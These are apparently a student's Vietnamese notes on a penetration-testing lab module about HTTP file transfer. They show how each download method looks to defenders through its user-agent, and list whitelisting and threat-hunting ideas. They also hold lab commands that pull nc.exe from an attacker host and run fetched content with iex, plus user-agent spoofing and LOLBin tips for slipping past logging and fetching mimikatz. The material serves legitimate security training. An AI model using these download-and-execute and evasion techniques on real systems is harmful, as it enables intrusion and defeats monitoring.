Các tổ chức có thể thao tác 1 số bước để gây dựng các tác nhân người dùng. https://useragentstring.com/index.php

Invoke-WebRequest - Client
  PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe" 
  PS C:\htb> Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

Invoke-WebRequest - Server
  GET /nc.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

WinHttpRequest - Client
  PS C:\htb> $h=new-object -com WinHttp.WinHttpRequest.5.1;
  PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
  PS C:\htb> $h.send();
  PS C:\htb> iex $h.ResponseText

 
 WinHttpRequest - Server
  GET /nc.exe HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Msxml2 - Client
  PS C:\htb> $h=New-Object -ComObject Msxml2.XMLHTTP;
  PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
  PS C:\htb> $h.send();
  PS C:\htb> iex $h.responseText

Msxml2 - Server
  GET /nc.exe HTTP/1.1
  Accept: */*
  Accept-Language: en-us
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

Certutil - Client
 C:\htb> certutil -urlcache -split -f http://10.10.10.32/nc.exe 
  C:\htb> certutil -verifyctl -split -f http://10.10.10.32/nc.exe

Certutil - Server
  GET /nc.exe HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Accept: */*
  User-Agent: Microsoft-CryptoAPI/10.0

BITS - Client
  PS C:\htb> Import-Module bitstransfer;
  PS C:\htb> Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t;
  PS C:\htb> $r=gc $env:temp\t;
  PS C:\htb> rm $env:temp\t; 
  PS C:\htb> iex $r

BITS - Server
  HEAD /nc.exe HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  User-Agent: Microsoft BITS/7.8



\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Nội dung trang này tập trung vào phát hiện (Detection) các hành vi truyền file độc hại qua giao thức HTTP.

Ý chính:
Phát hiện qua command-line và user agent
  Blacklist (danh sách chặn) command-line dễ bị bypass.
  Whitelist (danh sách cho phép) tuy mất công thiết lập nhưng hiệu quả và bền vững hơn trong việc phát hiện lệnh bất thường.
  Các ứng dụng client-server như HTTP đều để lộ thông tin nhận diện qua user agent string. User agent không chỉ là trình duyệt (Chrome, Firefox) mà còn có thể là công cụ như cURL, Python script, sqlmap, Nmap, PowerShell…
  Tổ chức có thể xây dựng danh sách user agent hợp lệ, sau đó lọc ra các chuỗi lạ để phục vụ threat hunting.
Các ví dụ user agent trong truyền file độc hại
Trang này liệt kê nhiều kỹ thuật tải file bằng PowerShell hoặc công cụ Windows sẵn có, mỗi loại đều có dấu hiệu (User-Agent hoặc header) đặc trưng:
  Invoke-WebRequest → user agent của PowerShell.
  WinHttpRequest → user agent “Mozilla/4.0 … WinHttpRequest.5”.
  Msxml2.XMLHTTP → user agent tương tự Internet Explorer cũ.
  certutil → user agent của Microsoft-CryptoAPI.
  BITS (Background Intelligent Transfer Service) → user agent “Microsoft BITS/7.8”.
Khuyến nghị
  Tạo whitelist các binary/file hợp lệ, hoặc blacklist các binary hay bị lợi dụng (certutil, bitsadmin…).
  Theo dõi các user agent bất thường để phát hiện tấn công ngay khi nó diễn ra.
  Đây mới chỉ là “bề nổi”, các kỹ thuật nâng cao hơn sẽ được trình bày trong các module sau.
👉 Tóm gọn: Trang này dạy cách phát hiện truyền file độc hại bằng cách giám sát user agent và công cụ mặc định trên Windows, đồng thời nhấn mạnh whitelist và threat hunting qua bất thường trong user agent.


\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Thay đổi user agent để giả mạo 

Listing out User Agents
  PS C:\htb>[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
  
  Name       : InternetExplorer
  User Agent : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)
  
  Name       : FireFox
  User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0
  
  Name       : Chrome
  User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0
               Safari/534.6
  
  Name       : Opera
  User Agent : Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1
  
  Name       : Safari
  User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0
               Safari/533.16

Request with Chrome User Agent
  PS C:\htb> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
  PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

Listen
  naruto3co@htb[/htb]$ nc -lvnp 80
  
  listening on [any] 80 ...
  connect to [10.10.10.32] from (UNKNOWN) [10.10.10.132] 51313
  GET /nc.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6
  (KHTML, Like Gecko) Chrome/7.0.500.0 Safari/534.6
  Host: 10.10.10.32
  Connection: Keep-Alive


Sử dụng LOLBAS / GTFOBins để tránh logging & whitelisting
  Khi PowerShell hay Netcat bị hạn chế bởi application whitelisting hoặc bị giám sát bởi log, có thể dùng LOLBIN (Living Off the Land Binary).
  Ví dụ: GfxDownloadWrapper.exe (Intel Graphics Driver) có chức năng tải file, lợi dụng để tải mimikatz.exe.
  Tương tự, trên Linux có dự án GTFOBins cung cấp gần 40 binary phổ biến có thể dùng để tải hoặc truyền file.

Closing Thoughts
As we've seen in this module, there are many ways to transfer files to and from our attack host between Windows and Linux systems. It's worth practicing as many of these as possible throughout the modules in the Penetration Tester path. Got a web shell on a target? Try downloading a file to the target for additional enumeration using Certutil. Need to download a file off the target? Try an Impacket SMB server or a Python web server with upload capabilities. Refer back to this module periodically and strive to use all the methods taught in some fashion. Also, take some time whenever you're working on a target or lab to search for a LOLBin or GTFOBin that you've never worked with before to accomplish your file transfer goals.






